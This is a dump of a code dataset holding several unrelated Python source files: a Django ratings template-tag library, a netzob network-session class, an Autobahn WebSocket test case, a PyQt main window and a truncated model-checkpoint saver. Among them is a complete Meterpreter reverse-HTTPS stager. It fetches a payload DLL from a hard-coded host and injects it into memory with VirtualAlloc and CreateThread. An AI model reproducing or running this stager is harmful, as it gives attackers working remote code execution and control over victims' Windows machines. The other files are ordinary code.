repo_name
stringlengths 6
61
| path
stringlengths 4
230
| copies
stringlengths 1
3
| size
stringlengths 4
6
| text
stringlengths 1.01k
850k
| license
stringclasses 15
values | hash
int64 -9,220,477,234,079,998,000
9,219,060,020B
| line_mean
float64 11.6
96.6
| line_max
int64 32
939
| alpha_frac
float64 0.26
0.9
| autogenerated
bool 1
class | ratio
float64 1.62
6.1
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ella/django-ratings | django_ratings/templatetags/ratings.py | 1 | 12532 | from decimal import Decimal
from django import template
from django.db import models
from django.contrib.contenttypes.models import ContentType
from django.core.urlresolvers import reverse
from django.template.defaultfilters import slugify
from django_ratings.models import TotalRate
from django_ratings.forms import RateForm
from django_ratings.views import get_was_rated
from django.utils.translation import ugettext as _
from recepty import settings
register = template.Library()
DOUBLE_RENDER = getattr(settings, 'DOUBLE_RENDER', False)
#class RateUrlsNode(template.Node):
# def __init__(self, object, up_name, down_name, form_name=None):
# self.object, self.up_name, self.down_name = object, up_name, down_name
# self.form_name = form_name
#
# def render(self, context):
# obj = template.Variable(self.object).resolve(context)
# if obj and hasattr(obj, 'get_absolute_url'):
# context[self.up_name] = '%s%s/%s/' % (obj.get_absolute_url(), _('rate'), _('up'))
# context[self.down_name] = '%s%s/%s/' % (obj.get_absolute_url(), _('rate'), _('down'))
# elif obj:
# ct = ContentType.objects.get_for_model(obj)
# context[self.form_name] = RateForm(initial={'content_type' : ct.id, 'target' : obj._get_pk_val()})
# context[self.up_name] = reverse('rate_up')
# context[self.down_name] = reverse('rate_down')
# return ''
class RateUrlNode(template.Node):
def __init__(self, object, url_var_name, form_name=None):
self.object = object
self.url_var_name =url_var_name
self.form_name = form_name
def render(self, context):
obj = template.Variable(self.object).resolve(context)
if obj and hasattr(obj, 'get_absolute_url'):
context[self.url_var_name] = '%s%s/' % (obj.get_absolute_url(), slugify(_('rate')))
elif obj:
ct = ContentType.objects.get_for_model(obj)
context[self.form_name] = RateForm(initial={'content_type' : ct.id, 'target' : obj._get_pk_val()})
context[self.url_var_name] = reverse('rate')
return ''
#@register.tag('rate_urls')
#def do_rate_urls(parser, token):
# """
# Generate absolute urls for rating the given model up or down and store them in context.
#
# Usage::
#
# {% rate_urls for OBJ as var_up var_down %}
#
# {% rate_urls for OBJ as my_form var_up var_down %}
#
# Examples::
#
# {% rate_urls for object as url_up url_down %}
# <form action="{{url_up}}" method="POST"><input type="submit" value="+"></form>
# <form action="{{url_down}}" method="POST"><input type="submit" value="-"></form>
#
# {% rate_urls for object as rate_form url_up url_down %}
# <form action="{{url_up}}" method="POST">{{rate_form}}<input type="submit" value="+"></form>
# <form action="{{url_down}}" method="POST">{{rate_form}}<input type="submit" value="-"></form>
# """
# bits = token.split_contents()
# if (len(bits) != 6 and len(bits) != 7) or bits[1] != 'for' or bits[3] != 'as':
# raise template.TemplateSyntaxError, "%r .... TODO ....." % token.contents.split()[0]
# if len(bits) == 6:
# return RateUrlsNode(bits[2], bits[4], bits[5])
# else:
# return RateUrlsNode(bits[2], bits[5], bits[6], bits[4])
@register.tag
def rate_url(parser, token):
"""
Fills template variable specified in argument ``tpl_var`` with URL for sending rating value.
Usage::
{% rate_url for object as tpl_var %}
Example::
{% rate_url for object as r_url %}
<form action="{{r_url}}" method="POST">
<input type="text" name="rating" value="0"/>
<input type="submit" value="Rate it"/>
</form>
"""
bits = token.split_contents()
if len(bits) != 5:
raise template.TemplateSyntaxError('rate_rul template tag should be used like this: {% rate_url for object as tpl_var %}')
return RateUrlNode(bits[2], bits[4])
class RatingNode(template.Node):
def __init__(self, object, name, max=None, step=None, min2=None):
self.object, self.name = object, name
self.min, self.max, self.step, self.min2 = min, max, step, min2
def render(self, context):
obj = template.Variable(self.object).resolve(context)
if obj:
value = 0
if (self.min != None and self.max!=None and self.min2 != None):
self.step = Decimal(self.step)
self.min2 = Decimal(self.min2)
self.max = Decimal(self.max)
possible_values = int((self.max - self.min2)/self.step+1)
value = TotalRate.objects.get_normalized_rating(obj, 1, Decimal("1.0")/(possible_values/2))
value = value*(self.max - self.min2)/2 + (self.max+self.min2)/2
# Due to the nature of the 'get_normalized_rating' function, an odd number
# of possible return values is required. If the input parameters yield
# an even number of possible return values, an approximation is necessary.
#
# In the following cycle, the value closest to the obtained result still
# fulfilling the input 'min', 'max' and 'step' parameters is being looked for.
if possible_values%2 == 0:
old_value = self.min2
best_approximation = self.min2
while (1):
cur_value = old_value + self.step
if cur_value > self.max:
break
old_error = abs(old_value - value)
cur_error = abs(cur_value - value)
if cur_error <= old_error:
best_approximation = cur_value
elif cur_error >= best_approximation:
break
old_value = cur_value
value = best_approximation
elif (self.min is not None and self.max is not None):
value = TotalRate.objects.get_normalized_rating(obj, Decimal(self.max), Decimal(self.step))
else:
value = TotalRate.objects.get_total_rating(obj)
# Set as string to be able to compare value in template
context[self.name] = str(value)
return ''
@register.tag('rating')
def do_rating(parser, token):
"""
Get rating for the given object and store it in context under given name.
Usage::
Select total rating:
{% rating for OBJ as VAR %}
Normalize rating to <-X, X> with step Y and round to Z:
{% rating for OBJ max X step Y as VAR %}
Normalize rating to <X, Y> with step S:
{% rating for OBJ min X max Y step S as VAR %}
Notice:
In order to obtain correct results, (Y-X)/S must be in Z (integers).
Also, (Y-X)/S+1 (number of possible values the function can return)
should preferably be an odd number, as it better corresponds to
the way the 'get_normalized_rating' function works.
Examples::
{% rating for object as object_rating %}
object {{object}} has rating of {{object_rating}}
{% rating for object max 1 step 0.5 as object_rating %}
object {{object}} has rating of {{object_rating}} from (-1, -0.5, 0, 0.5, 1)
"""
bits = token.split_contents()
if len(bits) == 5 and bits[1] == 'for' and bits[3] == 'as':
return RatingNode(bits[2], bits[4])
if len(bits) == 9 and bits[1] == 'for' and bits[3] == 'max' \
and bits[5] == 'step' and bits[7] == 'as':
return RatingNode(bits[2], bits[8], bits[4], bits[6])
if len(bits) == 11 and bits[1] == 'for' and bits[3] == 'min' \
and bits[5] == 'max' and bits[7] == 'step' and bits[9] == 'as':
return RatingNode(bits[2], bits[10], bits[6], bits[8], bits[4])
raise template.TemplateSyntaxError, \
"{% rating for OBJ as VAR %} or {% rating for OBJ max X step Y as VAR %}"
class WasRatedNode(template.Node):
def __init__(self, object, name):
self.object, self.name = object, name
def render(self, context):
object = template.Variable(self.object).resolve(context)
ct = ContentType.objects.get_for_model(object)
context[self.name] = get_was_rated(context['request'], ct, object)
return ''
@register.tag('was_rated')
def do_was_rated(parser, token):
"""
{% was_rated for OBJ as VAR %}
"""
bits = token.split_contents()
if len(bits) == 5 and bits[1] == 'for' and bits[3] == 'as':
return WasRatedNode(bits[2], bits[4])
raise template.TemplateSyntaxError, "{% was_rated for OBJ as VAR %}"
class TopRatedNode(template.Node):
def __init__(self, count, name, mods=None):
self.count, self.name, self.mods = count, name, mods
def render(self, context):
context[self.name] = TotalRate.objects.get_top_objects(self.count, self.mods)
return ''
@register.tag('top_rated')
def do_top_rated(parser, token):
"""
Get list of COUNT top rated objects of given model and store them in context under given name.
Usage::
{% top_rated 5 [app.model ...] as var %}
Example::
{% top_rated 10 as top_rated_objects %}
{% for obj in top_rated_objects %} ... {% endfor %}
{% top_rated 10 articles.article as top_articles %}
{% for article in top_articles %} ... {% endfor %}
{% top_rated 10 articles.article photos.photo as top_objects %}
{% for obj in top_objects %} ... {% endfor %}
"""
bits = token.split_contents()
if len(bits) < 3 or bits[-2] != 'as':
raise template.TemplateSyntaxError, "%r .... TODO ....." % token.contents.split()[0]
count = int(bits[1])
mods = []
for mod in bits[2:-2]:
model = models.get_model(*mod.split('.', 1))
if not model:
raise template.TemplateSyntaxError, "%r .... TODO ....." % token.contents.split()[0]
mods.append(model)
return TopRatedNode(count, bits[-1], mods)
class IfWasRatedNode(template.Node):
def __init__(self, nodelist_true, nodelist_false, obj=None, ct=None, pk=None):
self.nodelist_true = nodelist_true
self.nodelist_false = nodelist_false
self.obj= None
if obj:
self.obj = template.Variable(obj)
self.ct = ct
self.pk = pk
def render(self, context):
if self.obj:
obj = self.obj.resolve(context)
ct = ContentType.objects.get_for_model(obj).id
pk = obj.pk
else:
ct = self.ct
pk = self.pk
if DOUBLE_RENDER and 'SECOND_RENDER' not in context:
return u"{%% load ratings %%}" \
u"{%% if_was_rated %(ct)s:%(pk)s %%}" \
u"%(nodelist_true)s{%% else %%}%(nodelist_false)s{%% endif_was_rated %%}" % ({
'ct' : ct,
'pk' : pk,
'nodelist_true' : self.nodelist_true.render(context),
'nodelist_false' : self.nodelist_false.render(context),
})
if get_was_rated(context['request'], ct, pk):
return self.nodelist_true.render(context)
else:
return self.nodelist_false.render(context)
@register.tag('if_was_rated')
def do_if_was_rated(parser, token):
"""
{% if_was_rated object %}...{% else %}...{% endif_was_rated %}
"""
bits = token.contents.split()
if len(bits) == 2:
kwargs = {}
# Opening tag
obj = bits[1]
if ":" in obj:
ct,pk = obj.split(":")
kwargs.update({"ct":int(ct), "pk":int(pk)})
else:
kwargs.update({"obj":obj})
# Nodelist true
nodelist_true = parser.parse(('else', 'endif_was_rated'))
token = parser.next_token()
kwargs.update({"nodelist_true":nodelist_true})
# Nodelist false
if token.contents == 'else':
nodelist_false = parser.parse(('endif_was_rated',))
kwargs.update({"nodelist_false":nodelist_false})
parser.delete_first_token()
else:
nodelist_false = template.NodeList()
return IfWasRatedNode(**kwargs)
raise template.TemplateSyntaxError, "{%% %s object %%}" % bits[0]
| bsd-3-clause | -4,608,076,433,966,314,500 | 37.091185 | 130 | 0.56647 | false | 3.661116 | false | false | false |
dasbruns/netzob | src/netzob/Common/Models/Vocabulary/Session.py | 1 | 13260 | # -*- coding: utf-8 -*-
#+---------------------------------------------------------------------------+
#| 01001110 01100101 01110100 01111010 01101111 01100010 |
#| |
#| Netzob : Inferring communication protocols |
#+---------------------------------------------------------------------------+
#| Copyright (C) 2011-2014 Georges Bossert and Frédéric Guihéry |
#| This program is free software: you can redistribute it and/or modify |
#| it under the terms of the GNU General Public License as published by |
#| the Free Software Foundation, either version 3 of the License, or |
#| (at your option) any later version. |
#| |
#| This program is distributed in the hope that it will be useful, |
#| but WITHOUT ANY WARRANTY; without even the implied warranty of |
#| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the |
#| GNU General Public License for more details. |
#| |
#| You should have received a copy of the GNU General Public License |
#| along with this program. If not, see <http://www.gnu.org/licenses/>. |
#+---------------------------------------------------------------------------+
#| @url : http://www.netzob.org |
#| @contact : [email protected] |
#| @sponsors : Amossys, http://www.amossys.fr |
#| Supélec, http://www.rennes.supelec.fr/ren/rd/cidre/ |
#+---------------------------------------------------------------------------+
#+---------------------------------------------------------------------------+
#| Standard library imports
#+---------------------------------------------------------------------------+
import uuid
#+---------------------------------------------------------------------------+
#| Related third party imports
#+---------------------------------------------------------------------------+
#+---------------------------------------------------------------------------+
#| Local application imports
#+---------------------------------------------------------------------------+
from netzob.Common.Utils.Decorators import typeCheck, NetzobLogger
from netzob.Common.Models.Vocabulary.Messages.AbstractMessage import AbstractMessage
from netzob.Common.Utils.SortedTypedList import SortedTypedList
from netzob.Common.Utils.TypedList import TypedList
from netzob.Common.Models.Vocabulary.ApplicativeData import ApplicativeData
from netzob.Common.Models.Vocabulary.AbstractField import AbstractField
@NetzobLogger
class Session(object):
"""A session includes messages exchanged in the same session. Messages
are automaticaly sorted.
Applicative data can be attached to sessions.
>>> import time
>>> from netzob.all import *
>>> # we create 3 messages
>>> msg1 = RawMessage("ACK", source="A", destination="B", date=time.mktime(time.strptime("9 Aug 13 10:45:05", "%d %b %y %H:%M:%S")))
>>> msg2 = RawMessage("SYN", source="A", destination="B", date=time.mktime(time.strptime("9 Aug 13 10:45:01", "%d %b %y %H:%M:%S")))
>>> msg3 = RawMessage("SYN/ACK", source="B", destination="A", date=time.mktime(time.strptime("9 Aug 13 10:45:03", "%d %b %y %H:%M:%S")))
>>> session = Session([msg1, msg2, msg3])
>>> print session.messages.values()[0]
[0;32m[1376037901.0 [0;m[1;32mA[1;m[0;32m->[0;m[1;32mB[1;m[0;32m][0;m 'SYN'
>>> print session.messages.values()[1]
[0;32m[1376037903.0 [0;m[1;32mB[1;m[0;32m->[0;m[1;32mA[1;m[0;32m][0;m 'SYN/ACK'
>>> print session.messages.values()[2]
[0;32m[1376037905.0 [0;m[1;32mA[1;m[0;32m->[0;m[1;32mB[1;m[0;32m][0;m 'ACK'
"""
def __init__(self, messages=None, _id=None, applicativeData=None, name="Session"):
"""
:parameter messages: the messages exchanged in the current session
:type data: a list of :class:`netzob.Common.Models.Vocabulary.Messages.AbstractMessage.AbstractMessage`
:parameter _id: the unique identifier of the session
:type _id: :class:`uuid.UUID`
:keyword applicativeData: a list of :class:`netzob.Common.Models.Vocabulary.ApplicaticeData.ApplicativeData`
"""
self.__messages = SortedTypedList(AbstractMessage)
self.__applicativeData = TypedList(ApplicativeData)
if messages is None:
messages = []
self.messages = messages
if _id is None:
_id = uuid.uuid4()
self.id = _id
if applicativeData is None:
applicativeData = []
self.applicativeData = applicativeData
self.name = name
@property
def id(self):
"""The unique identifier of the session.
:type: :class:`uuid.UUID`
"""
return self.__id
@id.setter
@typeCheck(uuid.UUID)
def id(self, _id):
if _id is None:
raise TypeError("Id cannot be None")
self.__id = _id
@property
def messages(self):
"""The messages exchanged in the current session.
Messages are sorted.
:type: a :class:`netzob.Common.Utils.TypedList.TypedList` of :class:`netzob.Common.Models.Vocabulary.Messages.AbstractMessage.AbstractMessage`
"""
return self.__messages
def clearMessages(self):
"""Delete all the messages attached to the current session"""
for msg in self.__messages.values():
msg.session = None
self.__messages.clear()
@messages.setter
def messages(self, messages):
if messages is None:
messages = []
# First it checks the specified messages are all AbstractMessages
for msg in messages:
if not isinstance(msg, AbstractMessage):
raise TypeError("Cannot add messages of type {0} in the session, only AbstractMessages are allowed.".format(type(msg)))
self.clearMessages()
for message in messages:
self.__messages.add(message)
message.session = self
@property
def applicativeData(self):
"""Applicative data attached to the current session.
>>> from netzob.all import *
>>> appData = ApplicativeData("test", Decimal(20))
>>> session = Session(applicativeData=[appData])
>>> print len(session.applicativeData)
1
>>> appData2 = ApplicativeData("test2", ASCII("helloworld"))
>>> session.applicativeData.append(appData2)
>>> print len(session.applicativeData)
2
>>> print session.applicativeData[0]
Applicative Data: test=Decimal=20 ((8, 8)))
>>> print session.applicativeData[1]
Applicative Data: test2=ASCII=helloworld ((0, 80)))
:type: a list of :class:`netzob.Common.Models.Vocabulary.ApplicativeData.ApplicativeData`.
"""
return self.__applicativeData
def clearApplicativeData(self):
while(len(self.__applicativeData) > 0):
self.__applicativeData.pop()
@applicativeData.setter
def applicativeData(self, applicativeData):
for app in applicativeData:
if not isinstance(app, ApplicativeData):
raise TypeError("Cannot add an applicative data with type {0}, only ApplicativeData accepted.".format(type(app)))
self.clearApplicativeData()
for app in applicativeData:
self.applicativeData.append(app)
@property
def name(self):
return self.__name
@name.setter
@typeCheck(str)
def name(self, _name):
if _name is None:
raise TypeError("Name cannot be None")
self.__name = _name
def getEndpointsList(self):
"""Retrieve all the endpoints couples that are present in the
session.
>>> from netzob.all import *
>>> msg1 = RawMessage("SYN", source="A", destination="B")
>>> msg2 = RawMessage("SYN/ACK", source="B", destination="A")
>>> msg3 = RawMessage("ACK", source="A", destination="C")
>>> session = Session([msg1, msg2, msg3])
>>> print len(session.getEndpointsList())
2
>>> print session.getEndpointsList()
[('A', 'B'), ('A', 'C')]
:return: a list containing couple of endpoints (src, dst).
:rtype: a :class:`list`
"""
endpointsList = []
for message in self.messages.values():
src = message.source
dst = message.destination
endpoints1 = (src, dst)
endpoints2 = (dst, src)
if (not endpoints1 in endpointsList) and (not endpoints2 in endpointsList):
endpointsList.append(endpoints1)
return endpointsList
def getTrueSessions(self):
"""Retrieve the true sessions embedded in the current
session. A session is here characterized by a uniq endpoints
couple.
TODO: a more precise solution would be to use flow
reconstruction (as in TCP).
>>> from netzob.all import *
>>> msg1 = RawMessage("SYN", source="A", destination="B")
>>> msg2 = RawMessage("SYN/ACK", source="B", destination="A")
>>> msg3 = RawMessage("ACK", source="A", destination="C")
>>> session = Session([msg1, msg2, msg3])
>>> print len(session.getTrueSessions())
2
>>> for trueSession in session.getTrueSessions():
... print trueSession.name
Session: 'A' - 'B'
Session: 'A' - 'C'
:return: a list containing true sessions embedded in the current session.
:rtype: a :class:`list`
"""
trueSessions = []
for endpoints in self.getEndpointsList():
trueSessionMessages = []
src = None
dst = None
for message in self.messages.values():
if message.source in endpoints and message.destination in endpoints:
trueSessionMessages.append(message)
if src is None:
src = message.source
if dst is None:
dst = message.destination
trueSession = Session(messages=trueSessionMessages, applicativeData=self.applicativeData, name="Session: '" + str(src) + "' - '" + str(dst) + "'")
trueSessions.append(trueSession)
return trueSessions
def isTrueSession(self):
"""Tell if the current session is true. A session is said to
be true if the communication flow pertain to a uniq
applicative session between a couple of endpoints.
>>> from netzob.all import *
>>> msg1 = RawMessage("SYN", source="A", destination="B")
>>> msg2 = RawMessage("SYN/ACK", source="B", destination="A")
>>> msg3 = RawMessage("ACK", source="A", destination="B")
>>> session = Session([msg1, msg2, msg3])
>>> print session.isTrueSession()
True
:return: a boolean telling if the current session is a true one (i.e. it corresponds to a uniq applicative session between two endpoints).
:rtype: a :class:`bool`
"""
if len(self.getTrueSessions()) == 1:
return True
else:
return False
@typeCheck(list)
def abstract(self, symbolList):
"""This method abstract each message of the current session
into symbols according to a list of symbols given as
parameter.
>>> from netzob.all import *
>>> symbolSYN = Symbol([Field(ASCII("SYN"))], name="Symbol_SYN")
>>> symbolSYNACK = Symbol([Field(ASCII("SYN/ACK"))], name="Symbol_SYNACK")
>>> symbolACK = Symbol([Field(ASCII("ACK"))], name="Symbol_ACK")
>>> symbolList = [symbolSYN, symbolSYNACK, symbolACK]
>>> msg1 = RawMessage("SYN", source="A", destination="B")
>>> msg2 = RawMessage("SYN/ACK", source="B", destination="A")
>>> msg3 = RawMessage("ACK", source="A", destination="B")
>>> session = Session([msg1, msg2, msg3])
>>> if session.isTrueSession():
... for src, dst, sym in session.abstract(symbolList):
... print str(src) + " - " + str(dst) + " : " + str(sym.name)
A - B : Symbol_SYN
B - A : Symbol_SYNACK
A - B : Symbol_ACK
:return: a list of tuples containing the following elements : (source, destination, symbol).
:rtype: a :class:`list`
"""
abstractSession = []
if not self.isTrueSession():
self._logger.warn("The current session cannot be abstracted as it not a true session (i.e. it may contain inner true sessions).")
return abstractSession
for message in self.messages.values():
symbol = AbstractField.abstract(message.data, symbolList)
abstractSession.append((message.source, message.destination, symbol))
return abstractSession
| gpl-3.0 | 9,043,246,579,454,872,000 | 41.216561 | 158 | 0.551675 | false | 4.125739 | false | false | false |
Brother-Simon/AutobahnTestSuite | autobahntestsuite/autobahntestsuite/case/case9_2_1.py | 14 | 2183 | ###############################################################################
##
## Copyright 2011 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
from case import Case
class Case9_2_1(Case):
DESCRIPTION = """Send binary message message with payload of length 64 * 2**10 (64k)."""
EXPECTATION = """Receive echo'ed binary message (with payload as sent)."""
def init(self):
self.DATALEN = 64 * 2**10
self.PAYLOAD = "\x00\xfe\x23\xfa\xf0"
self.WAITSECS = 10
self.reportTime = True
def onOpen(self):
self.p.createWirelog = False
self.behavior = Case.FAILED
self.expectedClose = {"closedByMe":True,"closeCode":[self.p.CLOSE_STATUS_CODE_NORMAL],"requireClean":True}
self.result = "Did not receive message within %d seconds." % self.WAITSECS
self.p.sendFrame(opcode = 2, payload = self.PAYLOAD, payload_len = self.DATALEN)
self.p.closeAfter(self.WAITSECS)
def onMessage(self, msg, binary):
if not binary:
self.result = "Expected binary message with payload, but got text."
else:
if len(msg) != self.DATALEN:
self.result = "Expected binary message with payload of length %d, but got %d." % (self.DATALEN, len(msg))
else:
## FIXME : check actual content
##
self.behavior = Case.OK
self.result = "Received binary message of length %d." % len(msg)
self.p.createWirelog = True
self.p.sendClose(self.p.CLOSE_STATUS_CODE_NORMAL)
| apache-2.0 | -4,340,786,548,976,465,000 | 37.690909 | 117 | 0.594137 | false | 3.926259 | false | false | false |
syphersec/injectors | python/meterpreter_reverse_https.py | 1 | 2893 | #
# Python windows/meterpreter/reverse_http stager
# (doesn't rely on shellcode)
#
# By: @harmj0y
#
import httplib, string, random, struct, ctypes, time
# helper for the metasploit http checksum algorithm
def checksum8(s):
# hard rubyish way -> return sum([struct.unpack('<B', ch)[0] for ch in s]) % 0x100
return sum([ord(ch) for ch in s]) % 0x100
# generate a metasploit http handler compatible checksum for the URL
def genHTTPChecksum():
chk = string.ascii_letters + string.digits
for x in xrange(64):
uri = "".join(random.sample(chk,3))
r = "".join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))
for char in r:
if checksum8(uri + char) == 92:
return uri + char
def connect():
# establish a HTTPS connection to the metasploit handler
c = httplib.HTTPSConnection("192.168.30.129", 443)
# get our checksumed resource
c.request("GET", "/" + genHTTPChecksum() )
response = c.getresponse()
# only return data if it was http code 200
if response.status == 200: return response.read()
else: return ""
# injects the meterpreter .dll into memory
def inject(dll):
# make sure we have something to inject
if dll != "":
# read in the meterpreter .dll and convert it to a byte array
shellcode = bytearray(dll)
# use types windll.kernel32 for virtualalloc reserves region of pages in virtual addres sspace
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
# use virtuallock to lock region for physical address space
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(shellcode)))
# read in the buffer
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
# moved the memory in 4 byte blocks
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
# launch in a thread
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
# waitfor singleobject
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
html = connect()
inject(html) | gpl-3.0 | -7,692,136,107,398,896,000 | 39.760563 | 104 | 0.546146 | false | 4.204942 | false | false | false |
autonimo/autonimo | autonimo/views/main_view.py | 1 | 5341 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from PyQt4 import QtCore, QtGui
from gen.ui_main_view import Ui_MainView
from views.component_view import ComponentView
from views.task_view import TaskView
# from views.component_main_window import ComponentMainWindow
# from views.routine_widget import RoutineWidget
from models import model
class MainView(QtGui.QMainWindow):
def __init__(self, model, comp_ctrl, task_ctrl):
super(MainView, self).__init__(None)
self.model = model
self.comp_ctrl = comp_ctrl
self.task_ctrl = task_ctrl
self.build_ui()
def build_ui(self):
self.ui = Ui_MainView()
self.ui.setupUi(self)
# self.build_subwindows()
# self.ui.action_routine_editor.triggered.connect(self.on_window_routine_editor)
self.build_menu_bar()
self.build_comps_dockwidget()
self.build_tasks_dockwidget()
self.ui.action_open_task.triggered.connect(self.on_open_task)
def build_menu_bar(self):
self.ui.action_about.triggered.connect(self.show_about)
def show_about(self):
QtGui.QMessageBox.information(self, model.APP_NAME, '{} v{}\n\n{}'.format(model.APP_NAME,
model.APP_VERSION,
model.APP_URL))
def on_open_task(self):
print self.model.app.activeWindow()
print self.ui.mdiArea.activeSubWindow()
print self.ui.mdiArea.focusWidget()
print ''
def build_comps_dockwidget(self):
self.ui.treeView_comps_available.setModel(self.model.comps_available_model)
self.ui.treeView_comps_available.setHeaderHidden(True)
self.ui.treeView_comps_available.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)
self.ui.treeView_comps_available.expandAll()
self.ui.treeView_comps_available.doubleClicked.connect(self.test2)
def build_tasks_dockwidget(self):
self.ui.treeView_tasks_available.setModel(self.model.tasks_available_model)
self.ui.treeView_tasks_available.setHeaderHidden(True)
self.ui.treeView_tasks_available.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)
self.ui.treeView_tasks_available.expandAll()
self.ui.treeView_tasks_available.doubleClicked.connect(self.test)
def test2(self, index):
# make a new task subwindow
comp = self.comp_ctrl.create_comp(index)
if comp is not None:
self.new_comp_subwindow(comp)
def test(self, index):
# make a new task subwindow
task = self.task_ctrl.create_task(index)
if task is not None:
self.new_task_subwindow(task)
def new_comp_subwindow(self, comp, params=None):
self.comp_view = ComponentView(self, comp)
self.ui.mdiArea.addSubWindow(self.comp_view)
self.comp_view.show()
def new_task_subwindow(self, task, params=None):
self.task_view = TaskView(self, task)
self.ui.mdiArea.addSubWindow(self.task_view)
self.task_view.show()
# self.task_widget = TaskWidget(self, task)
#
# # sub_window = QtGui.QMdiSubWindow()
# # sub_window.setWidget(task_widget)
#
# # w = QtGui.QWidget(self)
# #
# # w.add
# #
# # # w.move(300, 300)
# # w.setWindowTitle('Simple')
# # w.show()
#
#
# _ = self.ui.mdiArea.addSubWindow(self.task_widget)
#
# print 'ere'
# FormWidget.show()
# class FormWidget(QtGui.QWidget):
# def __init__(self, parent):
# super(FormWidget, self).__init__(parent)
# self.layout = QtGui.QVBoxLayout(self)
#
# self.button1 = QtGui.QPushButton("Button 1")
# self.layout.addWidget(self.button1)
#
# self.button2 = QtGui.QPushButton("Button 2")
# self.layout.addWidget(self.button2)
#
# self.setLayout(self.layout)
#
#
def build_subwindows(self):
# pass
# samples
# self.ui.mdiArea.closeAllSubWindows()
self.task_widget = TaskWidget(self, None)
_ = self.ui.mdiArea.addSubWindow(self.task_widget)
# self.task_widget.activateWindow()
self.task_widget.show()
#
# self.task_widget2 = TaskWidget(self)
# self.task_widget2.setWindowTitle('hello!')
# _ = self.ui.mdiArea.addSubWindow(self.task_widget2)
#
# # try putting a main window in a sub window
# self.component_main_window = ComponentMainWindow(self)
# _ = self.ui.mdiArea.addSubWindow(self.component_main_window)
# # self.component_main_window.show()
#
# self.routine_widget = RoutineWidget(self)
# _ = self.ui.mdiArea.addSubWindow(self.routine_widget)
# self.routine_editor = RoutineEditor(self)
# flags = self.routine_editor.windowFlags()
# # self.routine_editor.setWindowFlags(flags | QtCore.Qt.WindowStaysOnTopHint)
# # self.routine_editor.setWindowModality(QtCore.Qt)
#
# def on_window_routine_editor(self, checked):
# if checked:
# self.routine_editor.show()
# else:
# self.routine_editor.hide()
| gpl-3.0 | 4,671,854,105,564,582,000 | 27.715054 | 100 | 0.611496 | false | 3.523087 | false | false | false |
nearai/program_synthesis | program_synthesis/common/tools/saver.py | 1 | 5673 | """Tools to save/restore model from checkpoints."""
import argparse
import sys
import os
import torch
import re
import json
CHECKPOINT_PATTERN = re.compile('^checkpoint-(\d+)$')
class ArgsDict(dict):
def __init__(self, **kwargs):
super(ArgsDict, self).__init__()
for key, value in kwargs.items():
self[key] = value
self.__dict__ = self
def load_checkpoint(model, optimizer, model_dir, map_to_cpu=False, step=None):
path = os.path.join(model_dir, 'checkpoint')
if step is not None:
path += '-{:08d}'.format(step)
if os.path.exists(path):
print("Loading model from %s" % path)
if map_to_cpu:
checkpoint = torch.load(
path, map_location=lambda storage, location: storage)
else:
checkpoint = torch.load(path)
old_state_dict = model.state_dict()
for key in old_state_dict.keys():
if key not in checkpoint['model']:
checkpoint['model'][key] = old_state_dict[key]
model.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
return checkpoint.get('step', 0)
return 0
def load_and_map_checkpoint(model, model_dir, remap):
path = os.path.join(model_dir, 'checkpoint')
print("Loading parameters %s from %s" % (remap.keys(), model_dir))
checkpoint = torch.load(path)
new_state_dict = model.state_dict()
for name, value in remap.items():
# TODO: smarter mapping.
new_state_dict[name] = checkpoint['model'][value]
model.load_state_dict(new_state_dict)
def save_checkpoint(model, optimizer, step, model_dir, ignore=[],
keep_every_n=10000000):
if not os.path.exists(model_dir):
os.makedirs(model_dir)
path = os.path.join(model_dir, 'checkpoint')
step_padded = format(step, '08d')
state_dict = model.state_dict()
if ignore:
for key in state_dict.keys():
for item in ignore:
if key.startswith(item):
state_dict.pop(key)
torch.save({
'model': state_dict,
'optimizer': optimizer.state_dict(),
'step': step
}, '{}-{}'.format(path, step_padded))
if os.path.exists(path):
os.unlink(path)
source = 'checkpoint-' + step_padded
os.symlink(source, path)
# Cull old checkpoints.
if keep_every_n is not None:
all_checkpoints = []
for name in os.listdir(model_dir):
m = CHECKPOINT_PATTERN.match(name)
if m is None or name == source:
continue
checkpoint_step = int(m.group(1))
all_checkpoints.append((checkpoint_step, name))
all_checkpoints.sort()
last_step = float('-inf')
for checkpoint_step, name in all_checkpoints:
if checkpoint_step - last_step >= keep_every_n:
last_step = checkpoint_step
continue
os.unlink(os.path.join(model_dir, name))
class Saver(object):
"""Class to manage save and restore for the model and optimizer."""
def __init__(self, model, optimizer, keep_every_n=None):
self._model = model
self._optimizer = optimizer
self._keep_every_n = keep_every_n
def restore(self, model_dir, map_to_cpu=False, step=None):
"""Restores model and optimizer from given directory.
Returns:
Last training step for the model restored.
"""
last_step = load_checkpoint(
self._model, self._optimizer, model_dir, map_to_cpu, step)
return last_step
def save(self, model_dir, step):
"""Saves model and optimizer to given directory.
Args:
model_dir: Model directory to save.
step: Current training step.
"""
save_checkpoint(self._model, self._optimizer, step, model_dir,
